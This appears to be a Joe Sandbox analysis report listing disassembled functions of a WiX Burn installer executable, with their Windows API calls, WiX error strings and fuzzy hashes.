                                                                                                                                                          Function 0046B18E Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 137memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046B1A5
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0046B1DF
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0046B2F0
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                          • String ID: Failed getNamedItem in XmlGetAttribute(%ls)$Failed get_attributes.$Failed get_nodeValue in XmlGetAttribute(%ls)$Failed to allocate attribute name BSTR.$Failed to copy attribute value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                          • API String ID: 760788290-2893514785
                                                                                                                                                          • Opcode ID: e67bb97bb647ff56a366137ba8d90f276f02aabc0407f7c06bb81fee3795556d
                                                                                                                                                          • Instruction ID: 5ba22b86d75fee3b8b481e2df1ea61a8ec20de19fe37a6b1cf75605199bac07e
                                                                                                                                                          • Opcode Fuzzy Hash: e67bb97bb647ff56a366137ba8d90f276f02aabc0407f7c06bb81fee3795556d
                                                                                                                                                          • Instruction Fuzzy Hash: 6541E535740304BBDB119B94CC5DF6E37A9EB95B14F1000AAF905FB290EBB89941CBD9
                                                                                                                                                          Function 0046AC58 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 129COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0046AD56
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0046AD93
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0046ADA4
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to query IXMLDOMParseError.reason., xrefs: 0046AD3A
                                                                                                                                                          • Failed to query IXMLDOMParseError.srcText ., xrefs: 0046AD77
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046AC92
                                                                                                                                                          • Failed to query IXMLDOMParseError.errorCode., xrefs: 0046AC83
                                                                                                                                                          • Failed to query IXMLDOMParseError.linepos., xrefs: 0046AD0E
                                                                                                                                                          • Failed to query IXMLDOMParseError.filepos., xrefs: 0046ACBC
                                                                                                                                                          • Failed to query IXMLDOMParseError.line., xrefs: 0046ACE5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Failed to query IXMLDOMParseError.errorCode.$Failed to query IXMLDOMParseError.filepos.$Failed to query IXMLDOMParseError.line.$Failed to query IXMLDOMParseError.linepos.$Failed to query IXMLDOMParseError.reason.$Failed to query IXMLDOMParseError.srcText .$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                          • API String ID: 3341692771-2262128350
                                                                                                                                                          • Opcode ID: ac419329126950b26396367ec22f083ea1a63c757682ee82852260168ed47f46
                                                                                                                                                          • Instruction ID: 3ebd1e830965324a84045372205697a0bb537b652537c55aa7d44c6927400a6e
                                                                                                                                                          • Opcode Fuzzy Hash: ac419329126950b26396367ec22f083ea1a63c757682ee82852260168ed47f46
                                                                                                                                                          • Instruction Fuzzy Hash: C0417E74B40616FFEB058F54CD05E6EB778EF14B45F10006AFA01BB1A0EAB46E10DE9A
                                                                                                                                                          Function 0040A810 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 121timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 0040A838
                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 0040A84C
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A858
                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 0040A8CC
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A8D6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                          • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 2700948981-3139844080
                                                                                                                                                          • Opcode ID: 5b3e79c14f1e73e1237e9545a4227cdc0091e17144af8b1199b7d648a7b4fd19
                                                                                                                                                          • Instruction ID: 6fad916c169dbedc69a2277831b6c0e5b90c319066e3fdea440f0ffe01d20b6d
                                                                                                                                                          • Opcode Fuzzy Hash: 5b3e79c14f1e73e1237e9545a4227cdc0091e17144af8b1199b7d648a7b4fd19
                                                                                                                                                          • Instruction Fuzzy Hash: A9313772F4032577E721A6A48C46FEF7A68DF05B51F524136BE04FB2D1D6789C0182EA
                                                                                                                                                          Function 0041D166 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 117fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041D183
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041D193
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0041D2AA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: %ls container from working path '%ls' to path '%ls'$Container has no verification information: %ls$Copying$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 2528220319-3847090587
                                                                                                                                                          • Opcode ID: 28896a0abe1acda6859e4031bb54d4c01e7ec9ce62f13cac4d25cc9f0b57d717
                                                                                                                                                          • Instruction ID: 0e80f200336933fc2f245bcb973d741ef06dd3fdd81c96c68d39d7dc0a125146
                                                                                                                                                          • Opcode Fuzzy Hash: 28896a0abe1acda6859e4031bb54d4c01e7ec9ce62f13cac4d25cc9f0b57d717
                                                                                                                                                          • Instruction Fuzzy Hash: 5731C972A40215BBDF226E848C46FAF3A25EF45B10F11415AFF04791D1E3BAC96097AD
                                                                                                                                                          Function 0040B250 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 109libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 0040B27E
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040B285
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040B291
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                          • String ID: DllGetVersion$Failed to create msi.dll version from QWORD.$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp$msi
                                                                                                                                                          • API String ID: 4275029093-1690136764
                                                                                                                                                          • Opcode ID: 0244b8991ec16c8d0d34c00a1c06790edf71f267c9baa3c8e049c3e83c66ddee
                                                                                                                                                          • Instruction ID: 9789ff91b8c5858668b469e4af5beb65b3920ee255fcfdf676dfa3f281aabf0e
                                                                                                                                                          • Opcode Fuzzy Hash: 0244b8991ec16c8d0d34c00a1c06790edf71f267c9baa3c8e049c3e83c66ddee
                                                                                                                                                          • Instruction Fuzzy Hash: 3F310831E40625B7D72166A88C4ABAF7668DB04B54F11417BFE04FA2D1E6BC9C0086DD
                                                                                                                                                          Function 0044F6D9 Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 207COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?), ref: 0044F6F6
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044F93D
                                                                                                                                                          Strings
                                                                                                                                                          • Engine is active, cannot change engine state., xrefs: 0044F70E
                                                                                                                                                          • BA requested unknown payload with id: %ls, xrefs: 0044F759
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\externalengine.cpp, xrefs: 0044F720, 0044F7B3, 0044F92C
                                                                                                                                                          • Failed to set download password., xrefs: 0044F8AB
                                                                                                                                                          • Failed to set download URL., xrefs: 0044F83B
                                                                                                                                                          • BA did not provide container or payload id., xrefs: 0044F915
                                                                                                                                                          • Failed to set download user., xrefs: 0044F877
                                                                                                                                                          • Failed to set download authorization header., xrefs: 0044F7EA
                                                                                                                                                          • BA requested unknown container with id: %ls, xrefs: 0044F7A1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: BA did not provide container or payload id.$BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download authorization header.$Failed to set download password.$Failed to set download user.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
                                                                                                                                                          • API String ID: 3168844106-195893171
                                                                                                                                                          • Opcode ID: 437d2b303ffa29f6116822e6da80ee593af5217e39f0194f5b806a5bf1f23dfb
                                                                                                                                                          • Instruction ID: 15c49b3e4c77ff30ef71b3be53de7f9231c4ea4b95c1a082739607a4f2841f30
                                                                                                                                                          • Opcode Fuzzy Hash: 437d2b303ffa29f6116822e6da80ee593af5217e39f0194f5b806a5bf1f23dfb
                                                                                                                                                          • Instruction Fuzzy Hash: A161E571A40706BAEB21AE61CC45F977A68AF00714F11413BB904BB2C1E7B8ED94C798
                                                                                                                                                          Function 004721FB Relevance: 16.7, APIs: 3, Strings: 8, Instructions: 200stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                          • String ID: Failed to break URL into server and resource parts.$Failed to connect to URL: %ls$Failed to open internet URL: %ls$Failed to send request to URL: %ls$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$fgG$zgG
                                                                                                                                                          • API String ID: 1659193697-2193951561
                                                                                                                                                          • Opcode ID: aa3464fa8febb449d5b8377f3e27975523a0c4dfb400f2fcb7a9892bdc9f7307
                                                                                                                                                          • Instruction ID: 3107f280a7a47e660f78732fe146ffcefe0946e4e03a39ac17fab45ae9ecea19
                                                                                                                                                          • Opcode Fuzzy Hash: aa3464fa8febb449d5b8377f3e27975523a0c4dfb400f2fcb7a9892bdc9f7307
                                                                                                                                                          • Instruction Fuzzy Hash: FF51A231A00215BBDB219FE58D49EDF7B78EF48B10F158066FD08B7251D6B8D9409BA8
                                                                                                                                                          Function 00414990 Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 191COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(?,-000000B0,?,?,?,000000C8,00000000,00000001,00000000,00000000,?,00000000,?,00000000,004086B5,?), ref: 00414BA1
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,-000000B0,?,?,?,000000C8,00000000,00000001,00000000,00000000,?,00000000,?,00000000,004086B5,?), ref: 00414BAD
                                                                                                                                                            • Part of subcall function 00413FD8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 004140D6
                                                                                                                                                            • Part of subcall function 00413FD8: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 004140E7
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to create bootstrapper application pipename and secret, xrefs: 00414A0C
                                                                                                                                                          • Failed to create bootstrapper application process: %ls, xrefs: 00414A86
                                                                                                                                                          • Failed to create bootstrapper application engine context., xrefs: 00414AF4
                                                                                                                                                          • Failed to start listening to bootstrapper application engine pipe., xrefs: 00414B3C
                                                                                                                                                          • Failed while waiting for bootstrapper application to connect., xrefs: 00414ACB
                                                                                                                                                          • Failed to create bootstrapper application, xrefs: 00414B6A
                                                                                                                                                          • Failed to find bootstrapper application path., xrefs: 004149DD
                                                                                                                                                          • Failed to create bootstrapper application pipes, xrefs: 00414A39
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp, xrefs: 00414A4B, 00414A98, 00414B7C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID: Failed to create bootstrapper application$Failed to create bootstrapper application engine context.$Failed to create bootstrapper application pipename and secret$Failed to create bootstrapper application pipes$Failed to create bootstrapper application process: %ls$Failed to find bootstrapper application path.$Failed to start listening to bootstrapper application engine pipe.$Failed while waiting for bootstrapper application to connect.$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 2962429428-1681899986
                                                                                                                                                          • Opcode ID: 0168c9965c51409dc2e98712057dc00afbbd015cdcdf6de2da9c9aa292d288e1
                                                                                                                                                          • Instruction ID: 326369eec9e3c79232ad70bb13c27142335d20dced63185dbac1ae278f4b4b31
                                                                                                                                                          • Opcode Fuzzy Hash: 0168c9965c51409dc2e98712057dc00afbbd015cdcdf6de2da9c9aa292d288e1
                                                                                                                                                          • Instruction Fuzzy Hash: 8661E371E40319BBDB11DAA5CC45FEF7B74AF44720F21426AF914BB2C1D778A9808B98
                                                                                                                                                          Function 00467901 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 164registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,0046F6BA,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,-80000001,00000000), ref: 0046799D
                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,0046F6BA,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,-80000001,00000000), ref: 004679CB
                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,0046F6BA,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,-80000001,00000000), ref: 00467A52
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Enum$InfoQuery
                                                                                                                                                          • String ID: Failed to allocate string bigger for enum registry key.$Failed to allocate string to minimum size.$Failed to determine length of string.$Failed to enum registry key.$Failed to get max size of subkey name under registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 73471667-1664653701
                                                                                                                                                          • Opcode ID: 2b305e50b481bfcda930989d0213577f84489db96055e10292eed4aea7680a3d
                                                                                                                                                          • Instruction ID: 4c24fe0a9c51ad9fddec600e8343e8ce8d3708d16ad231adc714d88fbca4def2
                                                                                                                                                          • Opcode Fuzzy Hash: 2b305e50b481bfcda930989d0213577f84489db96055e10292eed4aea7680a3d
                                                                                                                                                          • Instruction Fuzzy Hash: FA416E75604224BBFB208B55CC49F6F3BADDF85764F21002BB904E7290F5788E01D7AA
                                                                                                                                                          Function 0046D12F Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 161COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,00000000,?,00000000,?,00000000,7FFFFFFF,?,00000000,7FFFFFFF,?,00000000,?,00000005,00000000), ref: 0046D266
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to canonicalize the directory.$Failed to canonicalize the path.$Failed to get length of canonicalized directory.$Failed to get length of canonicalized path.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp$wzDirectory is required.$wzDirectory must be a fully qualified path.$wzPath is required.
                                                                                                                                                          • API String ID: 1825529933-3101159277
                                                                                                                                                          • Opcode ID: a37df57adf2c91c51fb25a142e4aa93065cf09bdb4b2754ea5d932d29745239e
                                                                                                                                                          • Instruction ID: a1a22e7e3c59975847a529ef378e711541314c954ab373a3ff61bcfdeb0874db
                                                                                                                                                          • Opcode Fuzzy Hash: a37df57adf2c91c51fb25a142e4aa93065cf09bdb4b2754ea5d932d29745239e
                                                                                                                                                          • Instruction Fuzzy Hash: 8C410C70F80305B6EB20AA958C8AFEF766C9F56B45F110167B604BE1C1F6FC8D01965E
                                                                                                                                                          Function 0040E8FF Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 157COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Failed to find variable.$Failed to format variable '%ls' for condition '%ls'$Failed to get if variable is hidden.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$Failed to store formatted value for variable '%ls' for condition '%ls'$d:\a\wix\wix\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                          • API String ID: 2001391462-1707021091
                                                                                                                                                          • Opcode ID: c0f99c59bf51d4e2842c47c6c14aca82296894f34ec6b7b318fcfdae8ce09aa4
                                                                                                                                                          • Instruction ID: 98cf2be6fb4809c2fc9563614456494fd86ae58e1798d033ec4081148425ce6e
                                                                                                                                                          • Opcode Fuzzy Hash: c0f99c59bf51d4e2842c47c6c14aca82296894f34ec6b7b318fcfdae8ce09aa4
                                                                                                                                                          • Instruction Fuzzy Hash: A841FB32B8021477EB115A56CC86FE73A29AB05714F11447BFA04BE2D2D6BCDC109BE9
                                                                                                                                                          Function 0041C557 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 149COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
